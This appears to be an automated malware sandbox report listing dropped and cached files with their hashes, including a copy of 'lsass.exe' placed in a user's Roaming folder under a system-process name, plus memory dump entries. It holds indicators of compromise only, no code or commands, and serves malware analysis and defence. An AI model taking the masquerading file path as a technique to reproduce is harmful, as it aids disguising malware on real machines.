MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB
  MD5: 149e1d142e9d7c2fca97f1fef05c59c8
  SHA1: 85a61dcf4a5474018cde498c8ae4f45c6c4c63c3
  SHA256: ad06238a22fe68072bf7ab8f7b4423dc7c90296e41c7f3d7a16cc6d6f7010a82
  SHA512: a8ff1e8effe3a9d458db74b9239f530b39f7b5ea74921ea285762e167d20d216698729ea60a94dec60e1ee6913245c4b1c56d66cf2252dc80fa1e7fff94ce17a
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE
  MD5: bb43ca1db0fadc6ae53f5f74b390683b
  SHA1: 5785179b5a50c78c5f7b0575d34566a3f417d151
  SHA256: 7f3f97971e82a3aeaacb64f8feb0ef7df11db650211c065e92a320bf4adc0690
  SHA512: 4611364f95ccbaec4f29ca1728374c452b93c51b5debad83828d3fde5fdc5c0ac090134a7a759fa5e2d9de018a0871354a482bb9f023564938adf0ba51bcb32d
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
  MD5: 7769e706f7b0c56e9605a81623599f0b
  SHA1: 3d83a8866e647b78d8201cb4a0500ce926b76f68
  SHA256: ccf11aa28a6025572b9b4c89c12ce6f557bf6a578f187d7bfd6cd6f993b8ea63
  SHA512: d7187bf6636b23bb53c169ea714f2ab0b5994595ca8bb7347f7071ea10d322c398f092c2185151e7fed368bc08a92505fff387feeacd970b2ba877176aab73b6
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB
  MD5: 01af71658f8903dab9568aea0cccda57
  SHA1: eee0461ce62be9028842632862149fd6edc2af19
  SHA256: 21cfc25e74da4f93a3532dbb3a9202a8dde43d393b8c16e2113cc2c22f8a1a76
  SHA512: 9b919a08c308735298434067a96cb28ebfe569716bfeaa2ae505662846d80b6758bb35ac9729d865af133318e25de17a311d519788474d793e88c88fd2fd376b
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE
  MD5: c5dd9d4db0f4f6b03a6291a6faefb9fb
  SHA1: 8930d13e692723bb10ee8b6d78dea8b2e694490e
  SHA256: 6d34671eb68fe86da4f46521d1d92bf68fd970a0c8c2418f7b7ab878918408b1
  SHA512: e7f1fe083c2134250bf47bb77be171712a3afdfba35264ae0a3bd6221e9b8b417c53f2ca555d589db1f6c037386f04fe28b1e006cd906bee52f8cb1b942c3bf0
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
  MD5: 7ba42e82897d6cc5badc96eeac5eb59c
  SHA1: 05720eb516a52cd1b9f38e17ec1312d5cbba645b
  SHA256: 247e78221185de959fc87612603a469a6a68b1398c1b7b9e21c791de2e8c72d9
  SHA512: 695c73d06709da6247ddeb1b8778262daa5c90e1f0c7fdacddf490a5602db05815fe245f24312d2e7800fa7e91a37fc2bde9c8aeaa4f1c34ee4862e9a39193d8
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\RW8YYLAG\1QE7L3Q8.htm
  MD5: b1cd7c031debba3a5c77b39b6791c1a7
  SHA1: e5d91e14e9c685b06f00e550d9e189deb2075f76
  SHA256: 57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa
  SHA512: d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\UOAPEAJQ\R108ESDY.htm
  MD5: 8615e70875c2cc0b9db16027b9adf11d
  SHA1: 4ed62cf405311c0ff562a3c59334a15ddc4f1bf9
  SHA256: da96949ba6b0567343f144486505c8c8fa1d892fd88c9cbc3ef3d751a570724d
  SHA512: cd9dfc88dc2af9438b7d6b618d1b62029b3bdf739fc4daa5b37397afd12c4528561b3bf2fc3f3f2adf3fd1f582d5524332441fd30248fcd078e41aa91e17cb73
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
  MD5: 3058d76e5fb2f2d2f65e232e98536182
  SHA1: 3e6e9abd6241526bf932885d118cbbe54e4e1cbe
  SHA256: 5c1141aa7d0b9fba71822607f3b1b086e2cc4529e63221a9a6ede74fa366512f
  SHA512: b47bc559e183abe8d4be8e7b1f652f01bab0095bf37797d95a541d729dad82a8a1eb1a804bc7c009ab3d49b446498a2e6b487f680bb203df3e17c212f85dfd95
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
  MD5: 3058d76e5fb2f2d2f65e232e98536182
  SHA1: 3e6e9abd6241526bf932885d118cbbe54e4e1cbe
  SHA256: 5c1141aa7d0b9fba71822607f3b1b086e2cc4529e63221a9a6ede74fa366512f
  SHA512: b47bc559e183abe8d4be8e7b1f652f01bab0095bf37797d95a541d729dad82a8a1eb1a804bc7c009ab3d49b446498a2e6b487f680bb203df3e17c212f85dfd95
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
  MD5: 3058d76e5fb2f2d2f65e232e98536182
  SHA1: 3e6e9abd6241526bf932885d118cbbe54e4e1cbe
  SHA256: 5c1141aa7d0b9fba71822607f3b1b086e2cc4529e63221a9a6ede74fa366512f
  SHA512: b47bc559e183abe8d4be8e7b1f652f01bab0095bf37797d95a541d729dad82a8a1eb1a804bc7c009ab3d49b446498a2e6b487f680bb203df3e17c212f85dfd95
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
  MD5: 3058d76e5fb2f2d2f65e232e98536182
  SHA1: 3e6e9abd6241526bf932885d118cbbe54e4e1cbe
  SHA256: 5c1141aa7d0b9fba71822607f3b1b086e2cc4529e63221a9a6ede74fa366512f
  SHA512: b47bc559e183abe8d4be8e7b1f652f01bab0095bf37797d95a541d729dad82a8a1eb1a804bc7c009ab3d49b446498a2e6b487f680bb203df3e17c212f85dfd95
- memory/188-24-0x0000000000000000-mapping.dmp
- memory/208-2-0x0000000000000000-mapping.dmp
- memory/496-29-0x0000000000000000-mapping.dmp
- memory/1056-7-0x0000000000000000-mapping.dmp
- memory/1128-43-0x0000000000000000-mapping.dmp
- memory/1160-22-0x0000000000000000-mapping.dmp
- memory/1276-33-0x0000000000000000-mapping.dmp
- memory/1380-45-0x0000000000000000-mapping.dmp
- memory/1400-41-0x0000000000000000-mapping.dmp
- memory/1636-5-0x0000000000000000-mapping.dmp
- memory/1648-38-0x0000000000000000-mapping.dmp
- memory/2100-9-0x0000000000000000-mapping.dmp
- memory/2120-37-0x0000000000000000-mapping.dmp
- memory/2128-34-0x0000000000000000-mapping.dmp
- memory/2184-40-0x0000000000000000-mapping.dmp
- memory/2208-25-0x0000000000000000-mapping.dmp
- memory/2356-17-0x0000000000000000-mapping.dmp
- memory/2392-30-0x0000000000000000-mapping.dmp
- memory/2452-32-0x0000000000000000-mapping.dmp
- memory/2504-23-0x0000000000000000-mapping.dmp
- memory/2540-3-0x0000000000000000-mapping.dmp
- memory/2588-31-0x0000000000000000-mapping.dmp
- memory/2748-39-0x0000000000000000-mapping.dmp
- memory/3012-19-0x0000000000000000-mapping.dmp
- memory/3052-27-0x0000000000000000-mapping.dmp
- memory/3060-36-0x0000000000000000-mapping.dmp
- memory/3184-18-0x0000000000000000-mapping.dmp
- memory/3204-21-0x0000000000000000-mapping.dmp
- memory/3548-42-0x0000000000000000-mapping.dmp
- memory/3576-28-0x0000000000000000-mapping.dmp
- memory/3588-20-0x0000000000000000-mapping.dmp
- memory/3820-26-0x0000000000000000-mapping.dmp
- memory/3836-44-0x0000000000000000-mapping.dmp
- memory/4076-35-0x0000000000000000-mapping.dmp